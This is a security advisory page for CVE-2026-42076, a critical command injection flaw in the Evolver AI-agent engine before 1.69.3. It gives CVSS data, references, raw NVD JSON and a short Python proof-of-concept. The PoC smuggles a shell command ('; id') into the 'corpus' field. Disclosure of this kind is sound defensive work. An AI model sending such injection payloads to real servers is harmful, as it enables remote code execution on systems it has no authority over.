Security Vulnerability Report
CVE-2026-42076 CVSS 9.8 CRITICAL

CVE-2026-42076

Published: 2026-05-04 17:16:24
Last Modified: 2026-05-07 15:46:41

Description

Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a command injection vulnerability in the _extractLLM() function allows attackers to execute arbitrary shell commands on the server. The function constructs a curl command using string concatenation and passes it to execSync() without proper sanitization, enabling remote code execution when the corpus parameter contains shell metacharacters. This issue has been patched in version 1.69.3.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Evolver < 1.69.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Concept for CVE-2026-42076
# The vulnerable endpoint expects a 'corpus' parameter that is passed to execSync via string concatenation.
import requests

target_url = "http://vulnerable-host/api/extract"

# Payload attempts to execute 'id' command via command injection
# Using semicolon to separate commands
malicious_payload = "http://safe-corp.com/data; id"

data = {"corpus": malicious_payload}

try:
    response = requests.post(target_url, json=data)
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
except Exception as e:
    print(f"Error: {e}")

References

Weakness: CWE-78 (OS Command Injection)
https://github.com/EvoMap/evolver/releases/tag/v1.69.3
https://github.com/EvoMap/evolver/security/advisories/GHSA-j5w5-568x-rq53

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42076", "sourceIdentifier": "[email protected]", "published": "2026-05-04T17:16:24.440", "lastModified": "2026-05-07T15:46:40.943", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a command injection vulnerability in the _extractLLM() function allows attackers to execute arbitrary shell commands on the server. The function constructs a curl command using string concatenation and passes it to execSync() without proper sanitization, enabling remote code execution when the corpus parameter contains shell metacharacters. This issue has been patched in version 1.69.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://github.com/EvoMap/evolver/releases/tag/v1.69.3", "source": "[email protected]"}, {"url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-j5w5-568x-rq53", "source": "[email protected]"}, {"url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-j5w5-568x-rq53", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}